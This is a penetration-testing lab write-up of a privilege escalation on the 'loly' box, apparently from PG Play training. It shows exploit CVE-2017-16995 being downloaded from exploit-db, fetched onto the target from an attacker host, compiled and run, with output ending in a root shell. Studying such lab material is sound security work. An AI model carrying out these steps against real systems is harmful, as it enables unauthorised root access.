InfoSec LAB

Loly_Privilege_Escalation

Created: 2 min read

CVE-2017-16995

PEAS has identified that the target system is vulnerable to CVE-2017-16995

A vulnerability classified as critical was found in Linux Kernel up to 4.14.8. Affected by this vulnerability is the function check_alu_op of the file kernel/bpf/verifier.c of the component Sign Extension. The manipulation leads to memory corruption. This vulnerability is known as CVE-2017-16995. Attacking locally is a requirement. Furthermore, there is an exploit available. It is recommended to upgrade the affected component.

Exploit

Exploit available online

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/loly]
└─$ wget -q https://www.exploit-db.com/download/45010 ; mv 45010 CVE-2017-16995.c

Downloaded to Kali

Exploitation

loly@ubuntu:/dev/shm$ wget -q http://192.168.45.235/CVE-2017-16995.c

Delivery complete

loly@ubuntu:/dev/shm$ gcc CVE-2017-16995.c -gcc CVE-2017-16995.c -o CVE-2017-16995

Compile

loly@ubuntu:/dev/shm$ ./CVE-2017-16995
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88007be42900
[*] Leaking sock struct from ffff8800792f3a40
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88007b093b40
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88007b093b40
[*] credentials patched, launching shell...
# whoami
whoami
root
# hostname
hostname
ubuntu
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens224: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:36:61 brd ff:ff:ff:ff:ff:ff
    inet 192.168.120.121/24 brd 192.168.120.255 scope global ens224
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe9e:3661/64 scope link 
       valid_lft forever preferred_lft forever

System level compromise

Interactive Graph View

Backlinks